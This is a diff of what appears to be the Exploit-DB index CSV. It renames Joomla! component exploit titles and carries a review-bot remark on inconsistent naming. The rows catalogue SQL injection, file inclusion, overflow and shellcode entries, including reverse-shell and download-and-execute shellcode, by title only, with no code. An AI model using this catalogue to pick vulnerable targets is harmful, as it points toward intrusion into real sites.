|
||||
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
|
||||
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
|
||||
12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0
|
||||
|
@ -11677,7 +11677,7 @@ id,file,description,date,author,platform,type,port
|
|||
12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
|
||||
12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
|
||||
12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
|
||||
12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
|
||||
12796,platforms/php/webapps/12796.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
|
||||
12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0
|
||||
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
|
||||
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
|
||||
|
@ -11689,9 +11689,9 @@ id,file,description,date,author,platform,type,port
|
|||
12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0
|
||||
12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
|
||||
12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,php,webapps,0
|
||||
12812,platforms/php/webapps/12812.txt,"Joomla! Component com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
|
||||
12812,platforms/php/webapps/12812.txt,"Joomla! Component 'com_quran' - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
|
||||
12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0
|
||||
12814,platforms/php/webapps/12814.txt,"Joomla! Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
|
||||
12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
|
||||
12815,platforms/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0
|
||||
12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0
|
||||
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
|
||||
|
@ -11699,15 +11699,15 @@ id,file,description,date,author,platform,type,port
|
|||
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
|
||||
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
|
||||
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
|
||||
12822,platforms/php/webapps/12822.txt,"Joomla! Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0
|
||||
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
|
||||
12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0
|
||||
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0
|
||||
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long Filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
|
||||
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
|
||||
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
|
||||
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
|
||||
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
|
||||
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
|
||||
|
@ -11723,7 +11723,7 @@ id,file,description,date,author,platform,type,port
|
|||
12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
|
||||
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
|
||||
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
|
||||
40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -12107,7 +12107,7 @@ id,file,description,date,author,platform,type,port
|
|||
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
|
||||
13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
|
||||
13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
|
||||
13737,platforms/php/webapps/13737.txt,"Joomla! Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
|
||||
13737,platforms/php/webapps/13737.txt,"Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
|
||||
13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
|
||||
13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0
|
||||
13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
|
||||
|
@ -12118,9 +12118,9 @@ id,file,description,date,author,platform,type,port
|
|||
15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
|
||||
13744,platforms/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0
|
||||
13746,platforms/php/webapps/13746.txt,"Joomla! Component com_searchlog - SQL Injection",2010-06-06,d0lc3,php,webapps,0
|
||||
13746,platforms/php/webapps/13746.txt,"Joomla! Component 'com_searchlog' - SQL Injection",2010-06-06,d0lc3,php,webapps,0
|
||||
13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13748,platforms/php/webapps/13748.txt,"Joomla! Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13748,platforms/php/webapps/13748.txt,"Joomla! Component 'com_annonces' - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
|
||||
13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0
|
||||
13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0
|
||||
|
@ -12158,21 +12158,21 @@ id,file,description,date,author,platform,type,port
|
|||
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
|
||||
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
|
||||
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
|
||||
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
|
||||
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
|
||||
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
|
||||
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
|
||||
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
|
||||
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
|
||||
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
|
||||
|
@ -12274,10 +12274,10 @@ id,file,description,date,author,platform,type,port
|
|||
13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13920,platforms/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13925,platforms/php/webapps/13925.txt,"Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13926,platforms/php/webapps/13926.txt,"Joomla! Component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
|
||||
13923,platforms/php/webapps/13923.txt,"Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13925,platforms/php/webapps/13925.txt,"Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
|
||||
13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0
|
||||
13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
|
@ -12285,7 +12285,7 @@ id,file,description,date,author,platform,type,port
|
|||
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
|
||||
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
|
||||
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
|
||||
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
|
||||
13935,platforms/php/webapps/13935.txt,"Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
|
||||
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
|
||||
13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps,0
|
||||
13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0
|
||||
|
@ -12300,11 +12300,11 @@ id,file,description,date,author,platform,type,port
|
|||
13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
|
||||
13951,platforms/php/webapps/13951.txt,"Joomla! Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
|
||||
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
|
||||
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
|
||||
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component Hot Property com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
|
||||
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0
|
||||
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
|
||||
13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
|
||||
|
@ -12313,7 +12313,7 @@ id,file,description,date,author,platform,type,port
|
|||
14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
|
||||
13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0
|
||||
13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
|
||||
13962,platforms/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
|
||||
13962,platforms/php/webapps/13962.txt,"Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
|
||||
13964,platforms/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH (PoC)",2010-06-22,blake,windows,dos,0
|
||||
13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0
|
||||
|
@ -12326,9 +12326,9 @@ id,file,description,date,author,platform,type,port
|
|||
13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13977,platforms/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
|
||||
13979,platforms/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,php,webapps,0
|
||||
13979,platforms/php/webapps/13979.txt,"Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection",2010-06-22,v3n0m,php,webapps,0
|
||||
13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0
|
||||
13981,platforms/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
|
||||
13981,platforms/php/webapps/13981.txt,"Joomla! Component 'com_picasa2gallery' - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
|
||||
13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0
|
||||
13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0
|
||||
13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
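Review bot: The `'<name>' Parameter` wording is applied unevenly: entry 13979 in this hunk becomes `'catid' Parameter SQL Injection`, while entry 14126 in the `-12443,8` hunk is only rewritten to `'com_gamesbox' 1.0.2 - 'id' SQL Injection`. The `+`/`-` markers are lost on this page, so this assumes the quoted-name rows are the new side. For consistency the 14126 title would read `"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' Parameter SQL Injection"`. The component identifiers are also mixed: most new titles use the `com_` option name, but 13997 and 14062 use `'jeeventcalendar'`, 14054 uses `'jesubmit'`, and 14060 keeps the display name `'JE Media Player'`. Anyone matching installed Joomla! components against this index by title will miss entries that do not follow one convention, so it is worth confirming the option names against the referenced advisory files and settling on a single form.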
|
||||
|
@ -12341,7 +12341,7 @@ id,file,description,date,author,platform,type,port
|
|||
14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0
|
||||
13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
|
||||
13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
|
||||
13997,platforms/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
|
||||
13997,platforms/php/webapps/13997.txt,"Joomla! Component 'jeeventcalendar' - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
|
||||
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
|
||||
13999,platforms/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps,0
|
||||
14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0
|
||||
|
@ -12360,7 +12360,7 @@ id,file,description,date,author,platform,type,port
|
|||
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
|
||||
14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0
|
||||
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
|
||||
14017,platforms/php/webapps/14017.txt,"Joomla! Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
|
||||
14017,platforms/php/webapps/14017.txt,"Joomla! Component 'com_realtyna' - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
|
||||
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps,0
|
||||
|
@ -12384,19 +12384,19 @@ id,file,description,date,author,platform,type,port
|
|||
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
|
||||
14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0
|
||||
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
|
||||
14054,platforms/php/webapps/14054.txt,"Joomla! Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
|
||||
14055,platforms/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
|
||||
14054,platforms/php/webapps/14054.txt,"Joomla! Component 'jesubmit' - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
|
||||
14055,platforms/php/webapps/14055.txt,"Joomla! Component 'com_sef' - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
|
||||
14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0
|
||||
14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0
|
||||
14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0
|
||||
14059,platforms/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14060,platforms/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14059,platforms/php/webapps/14059.txt,"Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14060,platforms/php/webapps/14060.txt,"Joomla! Component 'JE Media Player' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
|
||||
14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,windows,dos,6667
|
||||
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
|
||||
14062,platforms/php/webapps/14062.txt,"Joomla! Component JE Event Calendar - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14063,platforms/php/webapps/14063.txt,"Joomla! Component JE Job com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14064,platforms/php/webapps/14064.txt,"Joomla! Component JE Section Finder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
|
||||
